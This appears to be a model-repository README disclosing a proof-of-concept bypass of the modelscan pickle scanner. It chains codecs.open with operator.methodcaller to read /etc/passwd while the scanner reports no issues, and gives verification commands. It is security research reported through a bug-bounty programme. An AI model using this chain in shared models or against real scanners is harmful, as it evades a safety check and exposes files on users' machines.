manja316's picture
Add README
60244fd verified
|
Raw
History Blame Contribute Delete
774 Bytes
metadata
tags:
  - security-research
  - proof-of-concept
license: mit

Modelscan Bypass PoC: codecs.open + operator.methodcaller

Purpose: Security research demonstrating a scanner bypass in ProtectAI modelscan.

Technique

  • codecs.open is not in modelscan's unsafe_globals blocklist (only builtins.open is blocked)
  • operator.methodcaller is not blocked (only operator.attrgetter is)
  • Chain: methodcaller('read')(codecs.open('/etc/passwd')) → reads any file

Verification

pip install modelscan
modelscan scan -p model.pkl
# Output: "No issues found!"

python3 -c "import pickle; print(pickle.load(open('model.pkl','rb'))[:100])"
# Output: contents of /etc/passwd

Responsible Disclosure

Submitted to ProtectAI via Huntr MFV program.